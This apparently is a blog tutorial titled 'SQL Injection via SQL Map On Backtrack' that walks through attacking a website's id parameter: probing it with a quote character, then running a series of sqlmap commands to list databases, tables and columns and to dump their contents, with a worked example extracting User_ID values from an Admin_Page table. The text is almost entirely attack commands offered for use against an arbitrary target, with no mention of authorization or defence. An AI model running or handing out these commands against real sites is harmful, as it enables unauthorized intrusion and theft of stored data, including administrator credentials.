suppose the target website is www.target.com/image.php?id=5
for checking for the vulnerability of the website just add ' at the end.. like this
www.target.com/image.php?id=5' then press Enter.. if an Error page appear then the website is vulnerable.... now start sqlmap in BackTrack...... type the following command
python ./sqlmap.py -u www.target.com/image.php?id=5 --dbs
this will give u the Database of the website now type
python ./sqlmap.py -u www.target.com/image.php?id=5 -D Database name --tables
this will give u the tables name.... now chose the Table name carefully...... then
python ./sqlmap.py -u www.target.com/image.php?id=5 -D Database name -T tablename --columns
this will give u the names of columns.... now chose column name carefully.....then
python ./sqlmap.py -u www.target.com/image.php?id=5 -D Database name -T tablename -C column name --dump
thats it..... you have done...........
for example:- Suppose the Database name is my_webarea and Table name is Admin_Page and column name is User_ID so the command will be
python ./sqlmap.py -u www.target.com/image.php?id=5 -D my_webarea -T Admin_Page -C User_ID --dump
hope you like... if you have any problem then Ask it in Comment!!!!!!!!!!!
SQL Injection via SQL Map On Backtrack
Reviewed by Almas Malik
on
02:01
Rating:
Reviewed by Almas Malik
on
02:01
Rating:
